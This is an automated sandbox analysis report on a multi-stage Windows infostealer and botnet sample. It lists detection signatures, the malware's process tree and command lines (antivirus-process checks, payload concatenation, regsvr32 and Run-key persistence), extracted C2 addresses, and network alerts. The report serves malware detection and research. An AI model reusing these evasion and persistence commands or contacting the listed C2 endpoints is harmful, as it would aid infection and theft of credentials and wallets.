
Windows Analysis Report
AApUa7VQiy.exe

Overview

General Information

Sample name: AApUa7VQiy.exe (renamed because the original name is a hash value)
Original sample name: e64310c17841e2f3ec344941fa3e61c8.exe
Analysis ID: 1604525
MD5: e64310c17841e2f3ec344941fa3e61c8
SHA1: e787c70035dbe6a8160926928e93febe2cbbeba2
SHA256: c2fc387fa598098bea4d5b3358b01db102dcf8d18cea07cfde50d4455e609ed0
Tags: exe, user-abuse_ch

Detection

LummaC, Amadey, LummaC Stealer, Socks5Systemz, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Socks5Systemz
Yara detected Stealc
Yara detected Vidar stealer
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Drops PE files with a suspicious file extension
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • AApUa7VQiy.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\AApUa7VQiy.exe" MD5: E64310C17841E2F3EC344941FA3E61C8)
    • BEB973FPO2R62ZWABVOVP8TC.exe (PID: 8140 cmdline: "C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe" MD5: 96EBC92F2EB23FAAE578CEC7E20032E6)
      • skotes.exe (PID: 2652 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 96EBC92F2EB23FAAE578CEC7E20032E6)
  • skotes.exe (PID: 7388 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 96EBC92F2EB23FAAE578CEC7E20032E6)
  • skotes.exe (PID: 572 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 96EBC92F2EB23FAAE578CEC7E20032E6)
    • infinity.exe (PID: 2164 cmdline: "C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe" MD5: 444869BDBA72AC6AD360BC18A6C5CACF)
      • infinity.tmp (PID: 2128 cmdline: "C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp" /SL5="$C0024,3499155,56832,C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe" MD5: 61D017E2BE4B54CFDCE1328E4F14AE81)
        • flv2aviconverter24.exe (PID: 2400 cmdline: "C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe" -i MD5: B7556F3536A754DC1F7ED0CF03C9CD01)
    • ktIplF5.exe (PID: 4272 cmdline: "C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe" MD5: 8202CF5E3C9C273DEB62E34476EF2FFB)
    • 179187318e.exe (PID: 664 cmdline: "C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe" MD5: F2432FDB07CAC95C4481843FF0E77FD7)
      • cmd.exe (PID: 2656 cmdline: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6796 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 3864 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 5916 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 6660 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7500 cmdline: cmd /c md 36469 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 7552 cmdline: extrac32 /Y /E Geographic MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 7576 cmdline: findstr /V "TEAMS" Mw MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7596 cmdline: cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 7612 cmdline: cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Avoiding.com (PID: 7628 cmdline: Avoiding.com L MD5: 62D09F076E6E0240548C2F837536A46A)
        • choice.exe (PID: 7644 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • df1b740bf8.exe (PID: 5308 cmdline: "C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe" MD5: 67EBBA5CD77B2452A5EF6A335CC057F9)
    • f46bdbcca4.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" MD5: EBE8A0F61F53A3817C3FBCC3AB3A1F4C)
      • f46bdbcca4.tmp (PID: 7972 cmdline: "C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp" /SL5="$E0074,1104885,161792,C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" MD5: BCC236A3921E1388596A42B05686FF5E)
        • f46bdbcca4.exe (PID: 8004 cmdline: "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT MD5: EBE8A0F61F53A3817C3FBCC3AB3A1F4C)
          • f46bdbcca4.tmp (PID: 6612 cmdline: "C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp" /SL5="$30490,1104885,161792,C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT MD5: BCC236A3921E1388596A42B05686FF5E)
            • regsvr32.exe (PID: 7892 cmdline: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • regsvr32.exe (PID: 2316 cmdline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
                • powershell.exe (PID: 6628 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 61f0c6628c.exe (PID: 8188 cmdline: "C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe" MD5: C3D89E95BFB66F5127AC1F2F3E1BD665)
      • cmd.exe (PID: 2012 cmdline: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7184 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7352 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 5464 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 5708 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 2260 cmdline: cmd /c md 764661 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 2744 cmdline: extrac32 /Y /E Fm MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 3764 cmdline: findstr /V "Tunnel" Addresses MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 4288 cmdline: cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 2552 cmdline: cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Macromedia.com (PID: 7520 cmdline: Macromedia.com F MD5: 62D09F076E6E0240548C2F837536A46A)
        • choice.exe (PID: 6620 cmdline: choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://185.215.113.115/c4becf79229cb002.php", "Botnet": "kira"}
{"C2 url": "https://warlikedbeliev.org/api", "Build Version": "7tx2jo--659"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0000000F.00000003.1955909943.0000000001239000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.1533551948.0000000000691000.00000040.00000001.01000000.00000006.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000006.00000003.1506211610.00000000051D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0000000C.00000002.2766438930.0000000002B28000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
(5 of 25 entries shown)

Source | Rule | Description | Author | Strings
7.2.skotes.exe.20000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
8.2.skotes.exe.20000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
6.2.BEB973FPO2R62ZWABVOVP8TC.exe.b00000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
9.2.skotes.exe.20000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

System Summary

Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\user\AppData\Local\Temp\1062128101\9673a0a47c.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 572, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9673a0a47c.exe
Source: Process started; Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2316, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 6628, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Local\Temp\1062128101\9673a0a47c.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 572, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9673a0a47c.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", CommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp" /SL5="$30490,1104885,161792,C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp, ParentProcessId: 6612, ParentProcessName: f46bdbcca4.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ProcessId: 7892, ProcessName: regsvr32.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe", ParentImage: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe, ParentProcessId: 664, ParentProcessName: 179187318e.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, ProcessId: 2656, ProcessName: cmd.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2316, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 6628, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2316, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 6628, ProcessName: powershell.exe
Source: Process started; Author: Joe Security; Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth", CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth", CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2656, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth", ProcessId: 6660, ProcessName: findstr.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-01T16:51:12.234973+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53675 | 104.21.18.116 | 443 | TCP
2025-02-01T16:51:19.965987+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49707 | 104.21.18.116 | 443 | TCP
2025-02-01T16:51:21.181051+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49708 | 104.21.18.116 | 443 | TCP
2025-02-01T16:51:22.469135+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49710 | 104.21.18.116 | 443 | TCP
2025-02-01T16:51:23.644659+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49719 | 104.21.18.116 | 443 | TCP
2025-02-01T16:51:25.047613+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49727 | 104.21.18.116 | 443 | TCP
2025-02-01T16:51:26.815072+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49742 | 104.21.18.116 | 443 | TCP
2025-02-01T16:51:28.273940+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49750 | 104.21.18.116 | 443 | TCP
2025-02-01T16:51:30.539910+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49765 | 104.21.18.116 | 443 | TCP
2025-02-01T16:52:19.288514+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53469 | 104.21.18.116 | 443 | TCP
2025-02-01T16:52:20.657500+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53471 | 104.21.18.116 | 443 | TCP
2025-02-01T16:52:22.157478+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53473 | 104.21.18.116 | 443 | TCP
2025-02-01T16:52:23.753152+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53474 | 104.21.18.116 | 443 | TCP
2025-02-01T16:52:25.394499+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53476 | 104.21.18.116 | 443 | TCP
2025-02-01T16:52:29.558799+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53478 | 104.21.18.116 | 443 | TCP
2025-02-01T16:52:32.698793+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53481 | 104.102.49.254 | 443 | TCP
2025-02-01T16:52:33.274774+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53482 | 104.21.18.116 | 443 | TCP
2025-02-01T16:52:37.239259+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53485 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:31.472848+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53580 | 172.67.139.144 | 443 | TCP
2025-02-01T16:53:32.754479+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53591 | 172.67.139.144 | 443 | TCP
2025-02-01T16:53:35.343409+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53608 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:36.764039+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53622 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:37.190824+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53626 | 172.67.139.144 | 443 | TCP
2025-02-01T16:53:39.229553+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53631 | 172.67.139.144 | 443 | TCP
2025-02-01T16:53:40.731356+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53634 | 172.67.139.144 | 443 | TCP
2025-02-01T16:53:41.887344+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53638 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:42.240219+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53640 | 172.67.139.144 | 443 | TCP
2025-02-01T16:53:43.668321+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53650 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:45.000979+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53653 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:45.159849+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53656 | 172.67.139.144 | 443 | TCP
2025-02-01T16:53:46.359812+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53657 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:47.289857+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53660 | 172.67.139.144 | 443 | TCP
2025-02-01T16:53:48.798145+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53663 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:52.704228+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53666 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:55.749075+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53669 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:57.171675+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53671 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:58.458518+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53673 | 104.21.18.116 | 443 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-01T16:52:08.182725+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53465 | 91.240.118.49 | 443 | TCP
